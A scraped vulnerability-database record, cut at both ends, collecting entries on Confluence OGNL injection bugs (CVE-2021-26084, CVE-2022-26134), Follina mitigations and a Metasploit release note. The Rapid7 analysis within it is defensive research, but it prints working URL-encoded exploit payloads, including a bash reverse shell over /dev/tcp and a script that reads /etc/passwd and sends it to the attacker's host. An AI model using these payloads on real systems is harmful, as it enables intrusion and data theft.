Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). 
Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. 
:)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "pentestpartners": [{"lastseen": "2022-07-13T15:54:57", "description": "\n\n_Disclaimer: I know this isn\u2019t a unique post on the subject, and that many other outlets are covering it, but this zero-day is so serious that it needs as much coverage as possible. 
It simply needs shouting about._\n\n**Updated 06/06/2022 following advice from Microsoft's [@reybango](<https://twitter.com/reybango>).**\n\nThe vulnerability was reported to Microsoft by Shadow Chaser Group member [@CrazymanArmy](<https://twitter.com/crazymanarmy>).\n\n### What is it?\n\nIt exists in Microsoft Windows Support Diagnostic Tool (MSDT), enabling remote code execution. It\u2019s been assigned a [CVE](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190>) and Microsoft provide details here [CVE-2022-30190](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>).\n\nMicrosoft says:\n\n\n\nA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user\u2019s rights.\n\n\n\nPut more simply: it makes arbitrary code execution attacks possible when previewing or opening documents.\n\n### How do I deal with it?\n\nThere are two protocol handlers that need to be unregistered: **ms-msdt** and **search-ms**. \n\n\n### ms-msdt\n\nMicrosoft were quick to publish a workaround to prevent attacks that exploit the vulnerability: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>\n\nThe advice in that post is to disable the MSDT URL Protocol:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c\n 3. 
Execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n### search-ms\n\n[@hackerfantastic](<https://twitter.com/hackerfantastic>) published advice [here](<https://twitter.com/hackerfantastic/status/1531793396423176193>). He said "Note that this is not CVE-2022-30190 but uses the same OLEObject vector as CVE-2021-40444 and CVE-2022-30190, however as it requires additional user interaction and an outbound UNC connection the CVSS risk score is reduced. It is also currently unpatched but mitigation steps work".\n\nThe steps are:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command \u201creg export HKEY_CLASSES_ROOT\\search-ms filename\u201c\n 3. Execute the command \u201creg delete HKEY_CLASSES_ROOT\\search-ms /f\u201d.\n\nAs with all workarounds it\u2019s on you to vet and investigate before deploying them.\n\nThere\u2019s more detail from the [nao_sec](<https://twitter.com/nao_sec>) cyber security research team [here](<https://twitter.com/nao_sec/status/1530196847679401984>).\n\n\n\nSANS have produced an analysis and remediation video [here](<https://www.youtube.com/watch?v=vHW_hb2m_pw>).\n\n * 19:20 Mitigations\n * 27:50 Detecting\n\n### Why is it called Follina?\n\nHere's [why](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>), thanks [@GossiTheDog](<https://twitter.com/GossiTheDog>)!\n\nThe post [Follina 0day exploit. 
Malicious code execution in Office docs](<https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T05:38:30", "type": "pentestpartners", "title": "Follina 0day exploit. Malicious code execution in Office docs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-01T05:38:30", "id": "PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93", "href": "https://www.pentestpartners.com/security-blog/follina-0day-exploit-malicious-code-execution-in-office-docs/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. 
Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)) and Windows CVE-2022-30190 ([AttackerKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>).\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). 
A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in the last 16 bits of the link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from 
[adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. 
If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26134 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence Server or Data Center may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. 
For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 
'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. 
The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at 
com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? 
\"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. 
For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xwork` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). 
It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. 
As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passwd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. 
